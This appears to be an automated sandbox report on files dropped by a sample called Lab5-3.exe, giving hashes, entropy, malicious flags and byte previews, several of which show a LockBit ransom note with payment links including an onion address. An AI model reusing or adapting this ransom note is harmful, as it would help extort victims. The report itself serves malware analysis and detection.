                                                                                                          Size (bytes):722408
                                                                                                          Entropy (8bit):7.010795261429839
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:AW+NHhzN3IFUCIS9aAHGZLKCc6IK2fMxCKjUS:Ap9hrCIS9aAHaozzMxCw
                                                                                                          MD5:CDA162D04F523BA8573C18F25A8F002F
                                                                                                          SHA1:2913CB964E02C9BC044961148277E3DE653B940F
                                                                                                          SHA-256:40C13EF34651CB8BD0A1926084106F2A01F085C9A1DEC4681871DD3C195971A6
                                                                                                          SHA-512:C512FA1E4017F500E513CFF30896987D8EAF2861BA827C4AC4A221A58EC948848C354E6215E82399405A4F39A266B38F65368C0A92D88F0240525308B4632F03
                                                                                                          Malicious:false
                                                                                                          Preview:...@...l..P.......J..0S..L.l..."B.|2?3%.T.`.o1...f.R.2R.1.#..Fe.H.0....K.....q.{..........KFrz..T..`....N...k.^.d2.Vu.l..s.Q.Yt....d.P.2..@..N)e.4...$.T.(..l...W.&.B.v.5e.*na?@..v\O1_.(.g+t..B.vs.Y.q...I..y.....dY.!.8t..~..._f.....T3...s.....h..2.....|g..3...D.r.d..}.vT.n....!..8..m.k./.3.l..{~..aD...$......5...H..r.y.c...U.9..".*.....A..p..cv..1^)I........"...2.@..pYt[..........0@|..,.9.X..3I<.A!.......j....S..z.g.%p......2...6...m.ZL.7...T"P. @M$...qt...oa;..A....l.b.|..b_V..Xo.?.C..4.2l,=....uT50..G..:....",.O..Y.h.Z...XX......K.U..D.97.*\~H.H...,.D........<.....".K.....w..+.9...../.. .#h..p4M...yobK,...u.-....^. SQ..IV3....E....lIe...C.&...+.h.m&x...Q`.y.."..x{..}#...z.. fN..a0a.S2.O).=d2.,.^9R.H..]..u.oB....u7a........4.N.....q.N.M.D..L.k+....E|z.:.kM.....9;.{C"zn..8...I.]........."..`.ia.......oq..^..U.. ..k..O...S*..../..u..(.....0......U......Z.G#.~..x..g....\.{.......> ..........h!.^l..%.B. .g..).i.....M.'......~..J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18131432
                                                                                                          Entropy (8bit):5.678101772204793
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:393216:hiGPfpz7jObkPgUr+gFwgX4VY02zLrzfJIRQ82jik02iHy6Qnxsu/T1KL43a1tzN:5+T4E
                                                                                                          MD5:3499BEEB10AB4D29F5039D694CE027CA
                                                                                                          SHA1:6B8ACB9BDFA9A5D12C3F20756EC10C046A3C03DA
                                                                                                          SHA-256:195C0292BC2FD240213F41F0AF87D19D7070FBE5723B2695FF629EEC9532114A
                                                                                                          SHA-512:3DEDE1C37641387C9C9F5179E2DEF5797ABE93D155D9BFF54F43728F20E9DD75C33C95FABEE3F95005960576AE2E769C79C163DE9D46CE8C06E89121954B2552
                                                                                                          Malicious:false
                                                                                                          Preview:+......j..<>..y|4...v+.P.....(......\u.{..h.....f..X....Ta=."....%.d....-.p.#.TM'.R`....-.&.............=.h....tS-..."T..q#.0..c.5.f....C. dz.....C.E@...t.i.A%..r..7...kk..B.8.....s2$*.W..K......j......!.<..62 .e9.....r....:.o.-v..;.-".(..9{].2.B.....3.L...Y{..2......\J..[(j.,..9...L.._.C...Z..d.....=~.......e.Gs.0!......b..F.Ie..f"2$B...G-......xk.F<Uq`_.@dM.m......R{i.OMy...:Q,..njOk.#.J.k.,`{.vl...*.A..5.h*;N..z.....{.K..f.N...Vbk'0...,I......'.....Z..r..I.:.-..)...cL...!.....{...*f...5q..W............LX_$.....91......7.j...\..._.......>...*tP7..77f...T.R.$y...2.m....E..oX.....:...x.p.7Y...[...|0.~.\%...QU...G#...E!.,..=gr6...V-.8y.9.M...]....z.@{h..z.z.p/.$.....J.V.C....nv....M.9\..A...mtQ..S..\..N>.........L.F..m.e..$..g.....-..Aa.......=.@&.......2.f...i.....+.........E....Z.....e.5>.U=..g._........7...JI.....Y ..vO.P....].2.rB.[.....e..!..-O.9$<`.x.\f6.-.H..... C..vt..h.Nn....?.p...5^.qs.,...<.WA..:.w.#.W...aF....'Y......D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):102928
                                                                                                          Entropy (8bit):7.9981677485499265
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:ZQ7xUsw8OHtWDF7IbvZ0wTJxIhp3IvJGbZ:iRwuIDpTJxm/Z
                                                                                                          MD5:1EBA64F060075589277EDB702A1C2CBE
                                                                                                          SHA1:0C2C85A993C4DE81E8706848907E2265883CBB79
                                                                                                          SHA-256:8F4E8D0A3D9BE7DCA9AA5C7BE22EA55C8173FC6D3E4D12F7730793F6EB31CAF4
                                                                                                          SHA-512:6AD0CF17BD700D9E15C13D52BFC0C11E79D302543A20B06CF0F2FEBC1A5C91855F06210449AE06DDFEBD8187D3F47386011A32CBC5C6C999AB73AF34F999C270
                                                                                                          Malicious:true
                                                                                                          Preview:E.3.*..}.l..~(B..........*..V.%._~s.C.........LN9.q.B).......N......V..(.W_x.&...;....c.I.........Fw..2.s..NB....8'Y..~E..V.@.Ph?..3.....5.m)qK..u...K..p.=...)j.|.P..>`.%.<.....M.Iml/9...e}....u...k..Xl.Y...{.q2.Vi.6..s.4.....e]w?...Lx.1..w{..c.....hO4...c...288dY.(.=n-#...d..u].....[..;.....R3..L?....=.......r}f..j.t..M...._0v...05.Zqp<. J....'...A.5..y.....[.;X.$!)...?3.~AP...*.k...`...ns.p...p....iC.8.V....N*......o.wX.sd.".&P.U6.QU....$..Xk?.-eW..(...I.c..KB%?...l..G...D5..?.x.............N....!.....WaW....[.F..m`...g..H...@...Q.....`l...uw.r..Yu.............2...+{...)m.2._....<.v..<6.12.el.,]../..~'Q...W.Nz~.9Q..r..%L..v.os....b.R..L|n.V.!#....uq.........T....by..MV.?C..{p...kE...ol...v.2...........o..8R..z.......27 .....].....R..s..{..F....+........W_J.j.].y.u}...9.FB !U.UM.X..9..n(..C.|...[.#|.....b....}..J.;rX..r.9....):Ra..f.p......T..L.Tr...9..4E.7.IQ.b5;.W.|....uO..k%(....i..w.$..h.*i^.+..5..[.......*i..AH..G.10.l..o...t:3..N
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):514576
                                                                                                          Entropy (8bit):6.822288992897764
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:QYC6rfRiRTn/DK6dNWGoVACL1AuPm1oIWt0zK1RCr8yH:wsQR7rFsVx1A+9OJn
                                                                                                          MD5:4178003F48565470CDA6F6E7541E7502
                                                                                                          SHA1:1E6DDC44E053D49E12EF68D5D2B8111B9655D1E0
                                                                                                          SHA-256:134CD6FEBEF2B2664DED9E77C4153EB3459A11F0F95099BF1B754C3907CF13E9
                                                                                                          SHA-512:322E5A10866AF838048F6E2BB0EABEF744641AA58EF11C49CD7454D68DCAD09575A7631F52F4618658084C2EC9CE91FDD671E76636A9903870125EFD8EF7CD3F
                                                                                                          Malicious:false
                                                                                                          Preview:'..[. H....qt:...xa...h..GXo..(.[.7h.y..:7.NSkTEBQ....s....;.....gngg./T.X..C......2...f<.\=.Y.P..R6F...6..W,'..........H...3bWFX(........6...n....d.:a(...#.....m...v..b.......}i.T(y..H,Cg.3.{d.....A..N.+~....-....C.X8....{1......:].u.R(-?....(.@... ._.X.kP).B.....^.O..r.Ia.i.uIx1.....G.).G....h.C:Ar..r..J..!F.k......!..iS..^..H.bN.QV`..j.2...XsA....SL.%.....(../..d.(..W..[M.=....l.:xN$x9.v.......k..^...=...*.&..Z|[....y.***.....o.9....R.v.......w....{...7......v...%.*..Z..$.t.......~....q.#.h.D.sk..=/...niu:....`|.....{C........Wg.C./..2g....W.20..W.(.e...&..J?4.B.........y6...j..N......uP......9...Z....rw......r.......1.....&r.E........B.6.|..p..3...... ...m.:7.t..m.Hw...{2...]n....bW..dJ.... /6;.l`^.m[.../.^Ku=d..'.8....s.G......?.P.Z1.p.A..%z......Z.....l..cdE B...+.........G..uu..;.\lp....b..Z;.OorN.b.......l..k...P&,...E.+....g[ .h:...|..&......U..(@|..........(..Gx.E..:..Y...Y..f;.6O..80..C..TuP.......O....r.!R.-.G>hQ.j.k..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):74768
                                                                                                          Entropy (8bit):7.997092932675813
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:58NEWIMjQSIXMIz3AuXUlV0IEEuDtrMeW5VUxPIKnmTJY3U4K6xCtMu/gZ:58taTnAuXUvEDt654ah6xCj/gZ
                                                                                                          MD5:0F3821C960FA87969E9BF3C90DAD22CF
                                                                                                          SHA1:7CDC5D0AE5954675F535D82EF63AB6D9D30C6764
                                                                                                          SHA-256:546E84D76C9B43919A868FB4B8F224D21E86E81CD0010D4F1626DB90CD9DED2D
                                                                                                          SHA-512:AB00539B0A6E806059F8A0632C9F5236A3B6D20569B2159D7DCCE23FAE8942446940D046BE20BBA11DDF982C9A927A7FF4A253054F9A968F042BC0C6A7EA7D29
                                                                                                          Malicious:true
                                                                                                          Preview:.7.......u9ZP,"dI^>.n....0...)......'.K..b...`..s....N/....Z...~.w3....4:...,<.....#.;J..<U...o.u.U.je..........=....lK..X..Rh..u2.=...j-hI.\n...........l..._A.....".(.o.]y9...ejm..N........{9..)...."A~.... .......y#5..dS.........kw..7.`}..d.=..,.46..."..\H......%..#...,.m..D<. ..~...DB~.:.DYM.h.x.*..Z.4..Q9.VWt..?..~.D.v..e.O.9..uk.>.......o-...b.$.....bd.../..LU..h.5]..-.E..Ce.n.K.4FU*6`t......#...-.~C..._:n..w.=*.....P.'e y.........'R,-.o;BTY#...9..T..{8e.l.....(......~sh.xk....m.N.w...(....o.[.{..cD...'t!'.)Q......q..'...r.6.I...d...".@...4.."....U./.0..2K.|6...tMD.v5.^.>I...@.\w..o.#.I..F.ux......x].i.....=..6..M.]'&G.^..c9.wIT<f......@Y...*..r.7..........W.1.........GR..e.*="....Q.Au...j7G...@-B..['&[O.M.N@..f..5...r.?.v..}.;.......i#.......a...q_..Z;..R..2s.~tT.A.!.W..F..... ...*..%.P....K!T_..f...u..?*.+.ft..A......1.E.M..eL..!R..Vz..$....W.AD.a..-....1..^t../..4.....m. ....L..../H.;.(......j.......H....oY~...Ac'5...........|..P.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):47664
                                                                                                          Entropy (8bit):7.996450060476697
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+mBVN3sXJBDqH2KFjGLdNdpQdMdEJzAQK9q6CUGhMvkgJ724Bs0S0O9ZwQIvSVmY:+uVN8Xrk2nNUMdssanShJ7dBs0SPZwJG
                                                                                                          MD5:B7FDF136ED5BA7099349BF606F04160C
                                                                                                          SHA1:A1FF5D33EBB1A27CDDDFBEA783701310A35B6BA0
                                                                                                          SHA-256:8C70469857BDD9894E1E819DC2EB7776E9D7A3182B1B26592567C72EC5544AA0
                                                                                                          SHA-512:4BE70FFB805DA956A7F516BBBD13C8A24821F3C189CDDB8E5345505720AE063DD030C8D83020E38F5A98B7A430CEDA7AEA8D3D504237DE06C42C0BDCCDD1AB2D
                                                                                                          Malicious:true
                                                                                                          Preview:q...."...h..4q.GI.)L+.QFGC.(..b.,.p7..B.].....V>..+.Uzd(..u.[>..r...g.a]..r..be..9y@{aX.e.....D+......9I...x..\.Q.<U.....m._........H.'G8.U....+0@C.O.>U.,]...<.v.....9....5Q....L..E...D.-y.c..#.F.r...6..!..-D.......4+.......R{vK.......5@.e.....xl@.l...8.AI-...wZL..=..r.J^8l..h.Bh...b...N...-.Yt..T......w......i&....E.]Fi............l../.v.=.y...'.N6.N..........a.=.aEk].3......._..t.1..D.....2$:i%+.nb/lX...'.Bi..K..3.~w.+..No.......H..H..R....5]TeG.)t..x.P.e...{....p...gt.3d . ...A..v..... 3.dd....2z..k.M.._.S..d.q...k<.f...B....7.Q?O...|.^.T...>...Fl...^..W...y.w..I.Z....E.Hw....W..2iz.90}...4]. g.=...D...7....e......K.:..>...i...X.....0..y....^G6.).=..+.'...h..TJ.%..v.....j.(K[...8.5.......K{.W.=l0.n..t....c6..g.K....b.si.....Rz...>._.;.S..aj(.....K.......F..Vc.v..dqN.....E...%...nY...tk|..E.nyxL....d.@%m.6!{62,.1..5.!..Y=W...=...+o.....o...\...~5N..hn..f...GCG..G.EM.q.f....5!8.O*C.[`..y.nqQ.....T.2.K.....JZ...fK1e.(.Xg.Q.S.k3..#..0Q...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23904
                                                                                                          Entropy (8bit):7.991979063482339
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:v34AGdcrI6jm8/6KhzlFngqUJT/3p5HabbDfKgevAZDzrz/d+owaK5TZB+4aHsdD:vbGWpmS6Khzllgq4r3KD5ND/5wTZ0RHw
                                                                                                          MD5:6BB3F6ABD3857243678866353E73D169
                                                                                                          SHA1:992F803027920F0BD3031276596AC5DA15DED8E7
                                                                                                          SHA-256:319D3ADE3058E02A580BD2CC5F0EBB13E1CC1ADBA544C52EF92DBF562F88F1D5
                                                                                                          SHA-512:F55178AF02B257230F0DFA5BEFACCF9A114C59EF92A12CC2635225CDD9842F1852E68D02FA435EE26E18082B178C6B7D423B96AD6E7B916E97939DD21A7B7506
                                                                                                          Malicious:true
                                                                                                          Preview:....}.....Di.....^-..@.........w.gBL..@.m+.....)......v...If.<...;X..a.i..`..K..t..yG...8..A$.(.`.fm....+...$.P.]....6.$5....@.]P........c.Ek......O.4C..>.f0..s!..JoK....'.....T..SR.].,RG3+.-Z.t......#........c_.. >..V...*..|..R)4...=....W....t.t.?.].QRV0x.v.n....*Pb=..ek....1.....W.V.E.D..S.f.A0...Z.H.ax...~....#..B-*l ..X+b..H5......u...H.1.y0t...Z.v...3..m+g7).Sx...0.....}....ef\...o..M.zA.....f^*.3."}|...g.........(N]D2.z.....l..Fw-Pq..+.Of;5X...2."...m.]...@.P|..0w.....17.....qq.X?/. GwLYz..G.........f^...,.%...[..j..:H.\-...\..[.,|..B.f...|...P.Y....3..&.v... '..0..dG.....fI..~/..2~..vE.w.....e..M.<C...R.....M..p....2.....s..2....abA..g.3..].j..Z#.!.y...F......<../.....A.>687...*.%.k%.:N.Q'.-O...i.....I$:.!....Yi.o.....|.?.H.{..80..-..j..%.z{k(.a.O.\|...,q#........n.l.b.'.&N..}IIU+.`~.Q5.9.!8......S.$2.a.EpW..58.U......w..`1......^.......U...3.Bz7.....Z.7..p.j%..WU.2T...m....k........^........ ......d.).../.....X.L|.fu.pM...W...r.^
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58784
                                                                                                          Entropy (8bit):7.9971791462731785
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:N5NDe/Yy6mTEcQ6CoomKqNnNYAVFKtQrNSqZ:NHDaz6KHCVmKqtNSqZ
                                                                                                          MD5:B22777A1685E1CDA7C8BA51822BBFEB0
                                                                                                          SHA1:9987171C0EBF493615A033147B908CE80FC47597
                                                                                                          SHA-256:F74FAA6F017C377AD9DFEFAFF5B87FEF74CD9E3F58404E0E89F7C4002F9D5FB0
                                                                                                          SHA-512:F9F5439635D485E7505AF401864E1DF8805D570B32F455C292703003C319ECCF823223F3D0CAE3ECEF792C52F2D9255491F0A6D63F61638FE18240FFD707EE37
                                                                                                          Malicious:true
                                                                                                          Preview:........8.PN^8o.^..C{.q.H..=..a...\..-.R.a...&......`..5_.-..h..l...u......w.3.z..9..E...K... ..t.Y.N.R...^JtR..Z..pp............r`n.?V...F.?....#..1R>....-&b.Vi..OPeS..J...F@|....d`.w.#D...r...(.dR....-.YQ..W..mz...%.. %x.....@t.bmn.[1..?,.e:.[...o.].]{.5.7.u...Y..'...W..Va........k~...`..I...B.!..H..LR.k.C.7x.c./..`Y.M.Q8>...9..........S...\....?........C...D.s.{Fl, .o....e.Y.b.X..G..X....)..=<..1.Yl*.l.Z..crZ./.9.C.l..*.d1$. ..:.#..B|.J.......qS....c9.j.sh.@......z8...B....v...........8..H.)..r.'....NF..?..*v.@.........}=....la*k...cY.2....!.+..Mg.'...iA..).6x.E-..G......j:...4............pfNf.......2....l........P..u..yu.g.Tu..2n.X.^T..*.g...'o^.X).Kb......+....L....c.|'.....@6..p9..T....[ ..2.re*#........2.P3......E..d...k.....?......6.y.%'S..H_.6^..%.m\X.N.7u.0..w.\...I.....z.*.z.e...g.~N."?.nm....}..J:`...4.....K.s.)DE..*./..0.c..v....@/..G,6......B\.j..........x.p.....U+...n...po4\l.\....T....."."~:.HXgg...[(-.......E.r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34576
                                                                                                          Entropy (8bit):7.994298126697765
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:7j2TrvjHunJ7zFqhhSl+ad61lKBj2EXcnZUE8KhTdFgf1mhzBSFeZ:7yfvjOnBzFqu4aA1lqtsnZf5W1ISsZ
                                                                                                          MD5:E704046A7F8DD73600EC79D68C32146B
                                                                                                          SHA1:891DE6B95F70FDD117D764E0B4D7FF4E43AA8B2A
                                                                                                          SHA-256:BE156446ADFEB58A9D05F757093CBE61540212602423FEE7C43DECF7C2820D42
                                                                                                          SHA-512:AB865E066723A44CD94BCE52FEE7FF481CAD6D809D45BA4C4ADD37A0EE1592358AAAFBCC9E156C0606B8D55FCC3C4975B545FFB03A8839D394B919A4C20D9C02
                                                                                                          Malicious:true
                                                                                                          Preview:....>..q.g%S.U.../Iv...../m..SW.....g....A.........r.E6.q.....#..-5.Qhy8)..`S....4..~....2...>.e_...C..u......w?..-a.O.6.......<<v...lL.....<+..t..a..g........>....a.....Mf...d.i.?...@t..._........+....V.7(......D..'...U.q..VU.....D.}.........j6.n..F......w#.....&G+............vt...n...G.\8.E..t..,..o#L.._A..\.r.y@........X..^l.+.j.z......t...;f=...f....Z.u.......s.\.d....D+t.E...I.Y...VP;H....5..oZ...k...y..);bI."....}/A.Dp.Q......@.G....'.}.J..r6.].d.57......V...x....iz_..x....B.D....__.5...;...:..~h...e.41*.|+.Bu..w....[.#.1..x..dOl..u...:G.W..._:+..g{(Y.1....p....j....<t....+.~./+....r^....f ..z@$Nc...:.X......Sv.&.....X.Z..HR....@L.Di..ZR._........FA..h...p....jk.j.....M.......]`Z4^...=. .9...Q.n i....d.s..-A.a..6!F...,.@..w.V...(.QCF....H.4..2..cwT..~..2....V.WRs..P.m..'.v........90....R..g....Y...C..`).,...K\..o.d.0.(........yY......J..j.{.[..$i|.2.V_..D.a.Qoq....d..RU(g....#8.?.'.....k=...+..7z9a*....N.z.5..|.....%s8.R.;.7..G...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48464
                                                                                                          Entropy (8bit):7.996771101973103
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:tfQNkFdHUSnQ87yRW1XxIwXvG4KWNJoLj0gCSJ7RElRQbZGKuntY+f/fsZ:tfmSnzyRaxJeiNBSJ7Sl9tY+HUZ
                                                                                                          MD5:CE76739DD477C8795405B9C9C18E06BC
                                                                                                          SHA1:BB449F0C5083A947199543C101374D38AE0C9277
                                                                                                          SHA-256:40013543D05CE8006042D17ED7D25BB78A9FCB670222ECF141CF2D29F580225D
                                                                                                          SHA-512:7D9355B34D72DF630017024BADB2AD4A4B1DB5491C8D1A4D8CD5904B5E977BD4CD2AB1D2C9764DD8A2BAD9237219DB788DF6A23E8109F46A0EA5750C3F588E8C
                                                                                                          Malicious:true
                                                                                                          Preview:.a.M...0.e4..l....T....?....3.*t.bwu.S...w..q.YloC.......s.R..R...."$._.L>...Z.W)......g.....R..}Bj=..c.&..|d....#.....#r.#b...C.V{,@.;. .I........;I.1=...YU.+o.m...4.WI......AIw..$.....L<...S........rF...I.|. .?.......o...>.3....;..H.-.3X..]p..0.T.q..o4.......#.bC1.T)9p.$.t.Z[...w1.K..^L(........S..........ee.Q..nf...3.:7.O.cy.+E.E....h....o..p..:.D..T..)Mo^2.1enSx..Q.[...3.o'..I..J.. .u..>........]...k....l.'..C!5..;j..s.4...........~....[......Rl..h.~.gQ.&y._|....,...*.S...!."o.{..~L.4.......t...]~W.J..."[.J.."..I...L......nY.F.....g..J.mN.Q....Y...80....Rb..I.]...........`:.t0..S......D:-...!..........|9.Z....\.U....w...V..6s...K.m}V....V..A2..A...\.i...{....w0...{x..h..8.....6@HG....#.4a.XO09..M..4......Y.....+.<....|.x.0..vz.....R..Kq..%....dY.%.5.l...2up.+.>.U..S.| 0^...a8c.....V..(&.r"2.........,.E.O..v-_......}.o..>&V.z2..A...!.{m.........m..a.c.?...!.>..}Yu.:..mdD.R.z...x...UG.S`Z.9Tq!....t..z.6..<VS,...Y.G&{..DL.p. .E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42288
                                                                                                          Entropy (8bit):7.995784202055519
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:rk8wxQwXYJHabmcwVAEFPgXkR4UiUo/4dJQoQWOp0jWmG+zmeVMpZ4cNWe9c6Z:DwxQwoJ6WtgXiNrhuOq0nS4KZZ
                                                                                                          MD5:D01A463E9B5759EB6E0D94F203DE5761
                                                                                                          SHA1:1772A5D4775D1858D820540B26305193964FCFF3
                                                                                                          SHA-256:23F2DD8F21C80B69C104A0B9E72EDA51BD07A6329EE857663AB736C93FA43E98
                                                                                                          SHA-512:48E76FFC74AAEC556B5FA9DCD560DE7B9D38AFE6154E0533B4F8D32808EF160381F8B9449DEF83E046DB8805420CF67890EEDF23CA191DAF260836F51686A461
                                                                                                          Malicious:true
                                                                                                          Preview:.<6.............^).~.3.Ruv...:<......o..G,...P....(.n......$|.C.N.R..H.J..A.;...88....pB..X...6`..=...yC..3U2.pW....%;E@..$..'-....)..:Z......{.....<.mW.....D+O&D.u..[.....Yi...3.g........I......*.~.2..l.w.....Z>...mz8...._.NaJPB1.md.<G.F.+....Q..uj.M#.&.\...8..%..2h6u..6}..u......."U~Yj.V.....5.*N.X>...k.5...m..8p...v..o...=....c......$.....C..'......?..y...7.u#.1...........(..M.HT_C<>......8..i.?...5.h..i....|u.+.}`.%<..8.C.~*.......]cp8i).eQ..;...w..[..|.....<)))...?..........>..e.....D...w...A6B.;.mc....(n..).7.%jgY.m.jT%....n*t....`c..\i....n..;V......e....[.f.K..3.......&.t4...|...pw_'OU.......h.%).U.O..f.`....(Pw.+.A.....3d..5...}Y#..p.e..b....k....d_.o......L.,..)...2.h........|.....B.....J...z.T6.8....K~.O...&.K].d..@..M..Z....B../.9K.A.....!......{..<.-..e!.C%.....E.BS...'i).p...8..g.I.P...z_....r;\......\N..'..oxAV.-|.l......E@.h..wB.&......5J.5}e.......K....Wi...5.}L./'..............X.>t..M.6$^.Y...J`P.)(.X....[q....L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):117520
                                                                                                          Entropy (8bit):7.9982135007597694
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:PMeUdbwLqJF7lcu227m14QofLxWLOM8L7yd9XSC1R1pDShkjT9oYWBM5a4rmoyEz:PYbwLiZ04QooLxBhRShep0asICzCpSKZ
                                                                                                          MD5:68EFE3726D45FEC998236B9DF857EF1C
                                                                                                          SHA1:D150A6489C4CB3141840DBD7BE97AD9829752611
                                                                                                          SHA-256:FAB9A52992E2910BF8D41FC37E03432E0F7EBEF4565463896E111E62E4E4A742
                                                                                                          SHA-512:3EF52E4E79785A3A712F2B56E07691FCFFBB51D7A839D0F7CA5BB849649B4D8D75ED0B39FAEDB21E56D732A9CC625A114EBA64E7E8F2C9C817F88920C4929F7F
                                                                                                          Malicious:true
